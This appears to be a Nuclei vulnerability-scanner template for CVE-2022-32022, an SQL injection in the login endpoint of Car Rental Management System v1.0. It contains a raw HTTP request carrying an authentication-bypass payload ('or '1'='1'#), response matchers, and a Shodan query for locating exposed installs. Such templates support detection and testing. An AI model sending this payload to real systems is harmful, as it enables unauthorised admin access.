nuclei-templates/cves/2022/CVE-2022-32022.yaml

40 lines
906 B
YAML

id: CVE-2022-32022
info:
name: Car Rental Management System v1.0 - SQL Injection
author: arafatansari
severity: high
description: |
Car Rental Management System v1.0 is vulnerable to SQL Injection via /admin/ajax.php?action=login.
reference:
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32022
metadata:
shodan-query: http.html:"Car Rental Management System"
verified: "true"
tags: sql,cve,cms,2022
requests:
- raw:
- |
POST /admin/ajax.php?action=login HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
username=admin'+or+'1'%3D'1'%23&password=admin
matchers-condition: and
matchers:
- type: word
part: body
words:
- '1'
- type: word
part: header
words:
- text/html
- type: status
status:
- 200